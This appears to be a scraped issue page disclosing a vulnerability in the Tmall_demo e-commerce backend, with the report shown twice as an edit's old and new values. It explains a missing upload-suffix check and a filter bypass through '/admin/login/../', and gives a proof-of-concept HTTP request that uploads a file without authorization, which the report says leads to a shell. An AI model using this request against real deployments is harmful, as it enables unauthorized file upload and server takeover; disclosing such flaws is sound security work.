代码拉取完成,页面将自动刷新
更新失败,请稍后重试!
/
详情
Mini-Tmall backend does not authorize administrators to upload any files with their avatars
评论 (2)
rabbit
创建了任务
误判申诉
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
取消
提交
原值
Vulnerability Product:Tmall_demo
Vulnerability version:before 2024.07.03
Vulnerability type:File Upload
Vulnerability Details:
1. In com.xq.tmall.controller.admin.AccountController#uploadAdminHeadImage, the administrator's head image upload is found. After uploading the file, the file suffix is directly obtained without any verification. Therefore, there is an arbitrary file upload vulnerability here.
2. Analysis found that as long as the URL contains /admin/login or /admin/account, the filter will not intercept the verification permission. There is an unauthorized access vulnerability here, which can directly access all backend interfaces without authorization.
3. Combined with the unauthorized access vulnerability at the filter, we can directly call the backend administrator avatar upload interface without authorization. Therefore, this vulnerability can be directly uploaded through the front-end file getshell. Next, we construct a POC. We must use burpsuit to send the package, otherwise ../ will be swallowed by the browser
```
POST /admin/login/../../tmall/admin/uploadAdminHeadImage HTTP/1.1
Host: localhost:8082
Content-Length: 214
sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRxK0sSj4CwVrqEa2
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Connection: close
------WebKitFormBoundaryRxK0sSj4CwVrqEa2
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/jpeg
this_is_admin_image_upload_vul_test
------WebKitFormBoundaryRxK0sSj4CwVrqEa2--
```
```
http://localhost:8082/tmall/res/images/item/adminProfilePicture/867ff88f-9152-4f16-b444-72f1a2179635.jsp
```
新值
Vulnerability Product:Tmall_demo
Vulnerability version:before 2024.07.03
Vulnerability type:File Upload
Vulnerability Details:
1. In com.xq.tmall.controller.admin.AccountController#uploadAdminHeadImage, the administrator's head image upload is found. After uploading the file, the file suffix is directly obtained without any verification. Therefore, there is an arbitrary file upload vulnerability here.
2. Analysis found that as long as the URL contains /admin/login or /admin/account, the filter will not intercept the verification permission. There is an unauthorized access vulnerability here, which can directly access all backend interfaces without authorization.
3. Combined with the unauthorized access vulnerability at the filter, we can directly call the backend administrator avatar upload interface without authorization. Therefore, this vulnerability can be directly uploaded through the front-end file getshell. Next, we construct a POC. We must use burpsuit to send the package, otherwise ../ will be swallowed by the browser
```
POST /admin/login/../../tmall/admin/uploadAdminHeadImage HTTP/1.1
Host: localhost:8082
Content-Length: 214
sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRxK0sSj4CwVrqEa2
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Connection: close
------WebKitFormBoundaryRxK0sSj4CwVrqEa2
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/jpeg
this_is_admin_image_upload_vul_test
------WebKitFormBoundaryRxK0sSj4CwVrqEa2--
```
```
http://localhost:8082/tmall/res/images/item/adminProfilePicture/867ff88f-9152-4f16-b444-72f1a2179635.jsp
```
登录 后才可以发表评论